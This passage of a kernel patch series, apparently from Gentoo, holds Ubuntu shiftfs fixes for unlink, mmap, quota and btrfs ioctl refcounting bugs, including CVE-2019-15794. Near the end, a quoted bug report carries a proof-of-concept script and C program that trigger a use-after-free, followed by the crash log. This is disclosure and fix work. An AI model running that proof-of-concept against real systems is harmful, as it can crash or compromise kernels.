- 	file->private_data = file_info;
-+	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
-+	file->f_mapping = realfile->f_mapping;
-+
- 	file_info->realfile = realfile;
- 	return 0;
- }
--- 
-2.39.2
-
-From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Fri, 19 Jul 2019 17:50:47 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct point down
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1837231
-
-This used to pass an unsigned long to copy_from_user() instead of a
-void __user * pointer. This will produce warning with a sufficiently
-advanced compiler.
-
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index addaa6e21e57..9006201c243d 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
- 	case BTRFS_IOC_SUBVOL_GETFLAGS:
- 		return true;
- 	case BTRFS_IOC_SUBVOL_SETFLAGS:
--		if (copy_from_user(&flags, arg, sizeof(flags)))
-+		if (copy_from_user(&flags, argp, sizeof(flags)))
- 			return false;
- 
- 		if (flags & ~BTRFS_SUBVOL_RDONLY)
--- 
-2.39.2
-
-From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Thu, 29 Aug 2019 20:45:07 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1841977
-
-The way we messed with setting i_nlink was brittle and wrong. We used to
-set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
-of the underlay dentry of the directory it resided in which makes no
-sense whatsoever. We also missed drop_nlink() which is crucial since
-i_nlink affects whether a dentry is cleaned up on dput().
-With this I cannot reproduce the bug anymore where shiftfs misleads zfs
-into believing that a deleted file can not be removed from disk because
-it is still referenced.
-
-Fixes: commit 87011da41961 ("shiftfs: rework and extend")
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 15 ++++++++++-----
- 1 file changed, 10 insertions(+), 5 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9006201c243d..e80db9480b5c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = dir->i_private;
-+	struct inode *inode = d_inode(dentry);
- 	int err;
- 	const struct cred *oldcred;
- 
-@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 		err = vfs_rmdir(loweri, lowerd);
- 	else
- 		err = vfs_unlink(loweri, lowerd, NULL);
--	inode_unlock(loweri);
- 	revert_creds(oldcred);
- 
--	shiftfs_copyattr(loweri, dir);
--	set_nlink(d_inode(dentry), loweri->i_nlink);
--	if (!err)
-+	if (!err) {
- 		d_drop(dentry);
- 
--	set_nlink(dir, loweri->i_nlink);
-+		if (rmdir)
-+			clear_nlink(inode);
-+		else
-+			drop_nlink(inode);
-+	}
-+	inode_unlock(loweri);
-+
-+	shiftfs_copyattr(loweri, dir);
- 
- 	return err;
- }
--- 
-2.39.2
-
-From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 30 Aug 2019 14:14:31 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects
- SLAB_RECLAIM_ACCOUNT
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1842059
-
-Shiftfs does not mark it's slab cache as reclaimable. While this is not
-a big deal it is not nice to the kernel in general. The shiftfs cache is
-not so important that it can't be reclaimed.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index e80db9480b5c..a21cb473e000 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void)
- {
- 	shiftfs_file_info_cache = kmem_cache_create(
- 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
--		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
-+		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
- 	if (!shiftfs_file_info_cache)
- 		return -ENOMEM;
- 
--- 
-2.39.2
-
-From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 2 Oct 2019 09:57:14 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1846265
-
-This commit simplifies how shiftfs open files, both regular files an
-directories.
-
-In the first iteration, we implemented a kmem cache for struct
-shiftfs_file_info which stashed away a struct path and the struct file
-for the underlay. The path however was never used anywhere so the struct
-shiftfs_file_info and therefore the whole kmem cache can go away.
-Instead we move to the same model as overlayfs and just stash away the
-struct file for the underlay in file->private_data of the shiftfs struct
-file.
-Addtionally, we split the .open method for files and directories.
-Similar to overlayfs .open for regular files uses open_with_fake_path()
-which ensures that it doesn't contribute to the open file count (since
-this would mean we'd count double). The .open method for directories
-however used dentry_open() which contributes to the open file count.
-
-The basic logic for opening files is unchanged. The main point is to
-ensure that a reference to the underlay's dentry is kept through struct
-path.
-
-Various bits and pieces of this were cooked up in discussions Seth and I
-had in Paris.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 105 +++++++++++++++++++++++----------------------------
- 1 file changed, 47 insertions(+), 58 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a21cb473e000..55bb32b611f2 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -31,13 +31,6 @@ struct shiftfs_super_info {
- 	unsigned int passthrough_mark;
- };
- 
--struct shiftfs_file_info {
--	struct path realpath;
--	struct file *realfile;
--};
--
--struct kmem_cache *shiftfs_file_info_cache;
--
- static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
- 			       umode_t mode, dev_t dev, struct dentry *dentry);
- 
-@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = {
- };
- 
- static struct file *shiftfs_open_realfile(const struct file *file,
--					  struct path *realpath)
-+					  struct inode *realinode)
- {
--	struct file *lowerf;
--	const struct cred *oldcred;
-+	struct file *realfile;
-+	const struct cred *old_cred;
- 	struct inode *inode = file_inode(file);
--	struct inode *loweri = realpath->dentry->d_inode;
-+	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
- 	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
- 
--	oldcred = shiftfs_override_creds(inode->i_sb);
--	/* XXX: open_with_fake_path() not gauranteed to stay around, if
--	 * removed use dentry_open() */
--	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
--	revert_creds(oldcred);
-+	old_cred = shiftfs_override_creds(inode->i_sb);
-+	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
-+				       info->creator_cred);
-+	revert_creds(old_cred);
- 
--	return lowerf;
-+	return realfile;
- }
- 
- #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
-@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
- 
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	lowerfd->flags = 0;
- 	lowerfd->file = realfile;
-@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- 
- static int shiftfs_open(struct inode *inode, struct file *file)
- {
--	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
--	struct shiftfs_file_info *file_info;
- 	struct file *realfile;
--	struct path *realpath;
- 
--	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
--	if (!file_info)
--		return -ENOMEM;
--
--	realpath = &file_info->realpath;
--	realpath->mnt = ssi->mnt;
--	realpath->dentry = file->f_path.dentry->d_fsdata;
--
--	realfile = shiftfs_open_realfile(file, realpath);
--	if (IS_ERR(realfile)) {
--		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+	realfile = shiftfs_open_realfile(file, inode->i_private);
-+	if (IS_ERR(realfile))
- 		return PTR_ERR(realfile);
--	}
- 
--	file->private_data = file_info;
-+	file->private_data = realfile;
- 	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
- 	file->f_mapping = realfile->f_mapping;
- 
--	file_info->realfile = realfile;
- 	return 0;
- }
- 
--static int shiftfs_release(struct inode *inode, struct file *file)
-+static int shiftfs_dir_open(struct inode *inode, struct file *file)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
-+	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
-+			       info->creator_cred);
-+	revert_creds(oldcred);
-+	if (IS_ERR(realfile))
-+		return PTR_ERR(realfile);
- 
--	if (file_info) {
--		if (file_info->realfile)
--			fput(file_info->realfile);
-+	file->private_data = realfile;
- 
--		kmem_cache_free(shiftfs_file_info_cache, file_info);
--	}
-+	return 0;
-+}
-+
-+static int shiftfs_release(struct inode *inode, struct file *file)
-+{
-+	struct file *realfile = file->private_data;
-+
-+	if (realfile)
-+		fput(realfile);
- 
- 	return 0;
- }
- 
-+static int shiftfs_dir_release(struct inode *inode, struct file *file)
-+{
-+	return shiftfs_release(inode, file);
-+}
-+
- static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	return vfs_llseek(realfile, offset, whence);
- }
-@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
- 
- static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 	const struct cred *oldcred;
- 	int ret;
- 
-@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
- {
- 	const struct cred *oldcred;
- 	int err = -ENOTDIR;
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
- 	err = iterate_dir(realfile, ctx);
-@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = {
- };
- 
- const struct file_operations shiftfs_dir_operations = {
-+	.open			= shiftfs_dir_open,
-+	.release		= shiftfs_dir_release,
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.fsync			= shiftfs_fsync,
- 	.iterate_shared		= shiftfs_iterate_shared,
- 	.llseek			= shiftfs_dir_llseek,
--	.open			= shiftfs_open,
- 	.read			= generic_read_dir,
--	.release		= shiftfs_release,
- 	.unlocked_ioctl		= shiftfs_ioctl,
- };
- 
-@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = {
- 
- static int __init shiftfs_init(void)
- {
--	shiftfs_file_info_cache = kmem_cache_create(
--		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
--		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
--	if (!shiftfs_file_info_cache)
--		return -ENOMEM;
--
- 	return register_filesystem(&shiftfs_type);
- }
- 
- static void __exit shiftfs_exit(void)
- {
- 	unregister_filesystem(&shiftfs_type);
--	kmem_cache_destroy(shiftfs_file_info_cache);
- }
- 
- MODULE_ALIAS_FS("shiftfs");
--- 
-2.39.2
-
-From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Wed, 6 Nov 2019 09:38:57 -0600
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs
- mmap fails
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850994
-
-shiftfs_mmap() overwrites vma->vm_file before calling the lower
-filesystem mmap but does not restore the original value on
-failure. This means it is giving a pointer to the lower fs file
-back to the caller with no reference, which is a bad practice.
-However, it does not lead to any issues with upstream kernels as
-no caller accesses vma->vm_file after call_mmap().
-
-With the aufs patches applied the story is different. Whereas
-mmap_region() previously fput a local variable containing the
-file it assigned to vm_file, it now calls vma_fput() which will
-fput vm_file, for which it has no reference, and the reference
-for the original vm_file is not put.
-
-Fix this by restoring vma->vm_file to the original value when the
-mmap call into the lower fs fails.
-
-CVE-2019-15794
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 15 +++++++++++----
- 1 file changed, 11 insertions(+), 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 55bb32b611f2..57d84479026b 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
- 
- 	shiftfs_file_accessed(file);
- 
--	if (ret)
--		fput(realfile); /* Drop refcount from new vm_file value */
--	else
--		fput(file); /* Drop refcount from previous vm_file value */
-+	if (ret) {
-+		/*
-+		 * Drop refcount from new vm_file value and restore original
-+		 * vm_file value
-+		 */
-+		vma->vm_file = file;
-+		fput(realfile);
-+	} else {
-+		/* Drop refcount from previous vm_file value */
-+		fput(file);
-+	}
- 
- 	return ret;
- }
--- 
-2.39.2
-
-From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 23 Oct 2019 14:22:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1849482
-
-Set the s_maxbytes limit to MAX_LFS_FILESIZE.
-Currently shiftfs limits the maximum size for fallocate() needlessly
-causing calls such as fallocate --length 2GB ./file to fail. This
-limitation is arbitrary since it's not caused by the underlay but
-rather by shiftfs itself capping the s_maxbytes. This causes bugs such
-as the one reported in [1].
-
-[1]: https://github.com/lxc/lxd/issues/6333
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 57d84479026b..6a2b5e3d0d53 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	inode->i_private = dentry->d_inode;
- 
- 	sb->s_magic = SHIFTFS_MAGIC;
-+	sb->s_maxbytes = MAX_LFS_FILESIZE;
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--- 
-2.39.2
-
-From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 23 Oct 2019 14:23:50 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective
- capabilities
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1849483
-
-Currently shiftfs allows to exceed project quota and reserved space on
-e.g. ext2. See [1] and especially [2] for a bug report. This is very
-much not what we want. Quotas and reserverd space settings set on the
-host need to respected. The cause for this issue is overriding the
-credentials with the superblock creator's credentials whenever we
-perform operations such as fallocate() or writes while retaining
-CAP_SYS_RESOURCE.
-
-The fix is to drop CAP_SYS_RESOURCE from the effective capability set
-after we have made a copy of the superblock creator's credential at
-superblock creation time. This very likely gives us more security than
-we had before and the regression potential seems limited. I would like
-to try this apporach first before coming up with something potentially
-more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
-limiting factor in most use-cases.
-
-[1]: https://github.com/lxc/lxd/issues/6333
-[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 6a2b5e3d0d53..0d6ce377b07c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	sb->s_flags |= SB_POSIXACL;
- 
- 	if (sbinfo->mark) {
-+		struct cred *cred_tmp;
- 		struct super_block *lower_sb = path.mnt->mnt_sb;
- 
- 		/* to mark a mount point, must root wrt lower s_user_ns */
-@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			sbinfo->passthrough_mark = sbinfo->passthrough;
- 		}
- 
--		sbinfo->creator_cred = prepare_creds();
--		if (!sbinfo->creator_cred) {
-+		cred_tmp = prepare_creds();
-+		if (!cred_tmp) {
- 			err = -ENOMEM;
- 			goto out_put_path;
- 		}
-+		/* Don't override disk quota limits or use reserved space. */
-+		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
-+		sbinfo->creator_cred = cred_tmp;
- 	} else {
- 		/*
- 		 * This leg executes if we're admin capable in the namespace,
--- 
-2.39.2
-
-From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 1 Nov 2019 10:41:03 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl
- handling
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
-file from the lower filesystem without taking an additional
-reference to that file. After the btrfs ioctl completes this fd
-is closed, which then puts a reference to that file, leading to a
-refcount underflow. Original bug report and test case from Jann
-Horn is below.
-
-Fix this, and at the sametime simplify the management of the fd
-to the lower file for the ioctl. In
-shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
-the lower file and set FDPUT_FPUT so that this reference will get
-dropped on fdput() in error paths. Do not maintain the struct fd
-in the caller, as it the fd installed in the fd table is
-sufficient to properly clean up. Finally, remove the fdput() in
-shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
-__close_fd() call.
-
-Original report from Jann Horn:
-
-In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
-
- src = fdget(oldfd);
- if (!src.file)
-  return -EINVAL;
- // src holds one reference (assuming multithreaded execution)
-
- ret = shiftfs_real_fdget(src.file, lfd);
- // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
- // extra references
- fdput(src);
- // this drops the only reference we were holding on src, and src was
- // the only thing holding a reference to lfd->file. lfd->file may be
- // dangling at this point.
- if (ret)
-  return ret;
-
- *newfd = get_unused_fd_flags(lfd->file->f_flags);
- if (*newfd < 0) {
-  // always a no-op
-  fdput(*lfd);
-  return *newfd;
- }
-
- fd_install(*newfd, lfd->file);
- // fd_install() consumes a counted reference, but we don't hold any
- // counted references. so at this point, if lfd->file hasn't been freed
- // yet, its refcount is one lower than it ought to be.
-
- [...]
-
- // the following code is refcount-neutral, so the refcount stays one too
- // low.
- if (ret)
-  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-
-shiftfs_real_fdget() is implemented as follows:
-
-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-{
- struct shiftfs_file_info *file_info = file->private_data;
- struct file *realfile = file_info->realfile;
-
- lowerfd->flags = 0;
- lowerfd->file = realfile;
-
- /* Did the flags change since open? */
- if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-  return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
- return 0;
-}
-
-Therefore, the following PoC will cause reference count overdecrements; I ran it
-with SLUB debugging enabled and got the following splat:
-
-=======================================
-user@ubuntu1910vm:~/shiftfs$ cat run.sh
-sync
-unshare -mUr ./run2.sh
-t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
-set -e
-
-mkdir -p mnt/tmpfs
-mkdir -p mnt/shiftfs
-mount -t tmpfs none mnt/tmpfs
-mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
-mount|grep shift
-touch mnt/tmpfs/foo
-gcc -o ioctl ioctl.c -Wall
-./ioctl
-user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
-
-int main(void) {
-  int root = open("mnt/shiftfs", O_RDONLY);
-  if (root == -1) err(1, "open shiftfs root");
-  int foofd = openat(root, "foo", O_RDONLY);
-  if (foofd == -1) err(1, "open foofd");
-  struct btrfs_ioctl_vol_args iocarg = {
-    .fd = foofd
-  };
-  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
-  sleep(1);
-  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
-  if (map != MAP_FAILED) munmap(map, 0x1000);
-}
-user@ubuntu1910vm:~/shiftfs$ ./run.sh
-none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
-/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
-[ 183.463452] general protection fault: 0000 [#1] SMP PTI
-[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
-[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
-[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
-[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
-[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
-[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
-[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
-[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
-[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
-[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
-[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
-[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
-[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
-[ 183.510580] Call Trace:
-[ 183.511396] mmap_region+0x417/0x670
-[ 183.512592] do_mmap+0x3a8/0x580
-[ 183.513655] vm_mmap_pgoff+0xcb/0x120
-[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
-[ 183.516155] __x64_sys_mmap+0x33/0x40
-[ 183.517352] do_syscall_64+0x5a/0x130
-[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
-[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
-[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
-[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
-[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
-[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
-[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
-[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
-[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
-[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
-[ 183.560350] ---[ end trace 4a860910803657c2 ]---
-[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
-[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
-[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
-[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
-[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
-[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
-[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
-[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
-[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
-[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
-[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
-=======================================
-
-Disassembly of surrounding code:
-
-55 push rbp
-4889E5 mov rbp,rsp
-4157 push r15
-4156 push r14
-4155 push r13
-4154 push r12
-488B87C8000000 mov rax,[rdi+0xc8]
-4C8B6810 mov r13,[rax+0x10]
